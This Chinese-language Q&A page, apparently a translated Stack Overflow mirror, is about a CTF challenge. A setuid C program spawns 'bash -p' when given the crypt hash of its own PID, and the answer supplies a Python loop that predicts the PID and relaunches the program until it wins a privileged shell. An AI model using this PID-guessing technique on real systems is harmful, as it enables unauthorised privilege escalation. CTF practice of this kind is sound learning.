1

大家好,我正在玩 CTF,我必须破解一个程序来获取 shell 源代码是:

/*
* gcc ch21.c -lcrypt -o ch21
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <crypt.h>
#include <sys/types.h>
#include <unistd.h>

int main (int argc, char *argv[]) {
char pid[16];
char *args[] = { "/bin/bash", "-p", 0 };

snprintf(pid, sizeof(pid), "%i", getpid());
if (argc != 2)
    return 0;

printf("%s=%s",argv[1], crypt(pid, "$1$awesome"));

if (strcmp(argv[1], crypt(pid, "$1$awesome")) == 0) {
    printf("WIN!\n");
execve(args[0], &args[0], NULL);

} else {
    printf("Fail... :/\n");
}
return 0;
}

现在我用 gdb 调试它,因为我从源代码中了解到我必须在运行时输入 proccessid (PID) 才能使用GDB-PEDA获得成功的 shell我在断点期间尝试了 getpid,但是如何使用 gdb 继续使用 proccess id 只运行命令传递输入对程序有什么帮助!

任何通知

4

1 回答 1

1

不确定我是否正确理解了您的问题,但是当达到限制时,PID 的范围和周期受到限制,最大值通常在 2^15 左右。您可以简单地运行一个循环,该循环将遍历潜在的 PID,以匹配将分配给进程的那个。

这样的事情会做:

import os, crypt, subprocess

pid = os.getpid()+50 #safe buffer for things created after python script was started
print "Selected: ",pid
for i in range(32768):
    sp = subprocess.Popen(['./ch21', crypt.crypt(str(pid), "$1$awesome")], stdout=subprocess.PIPE)
    output = sp.stdout.readline()
    if "Fail" not in output:
            print output
            break
于 2018-03-12T21:28:35.063 回答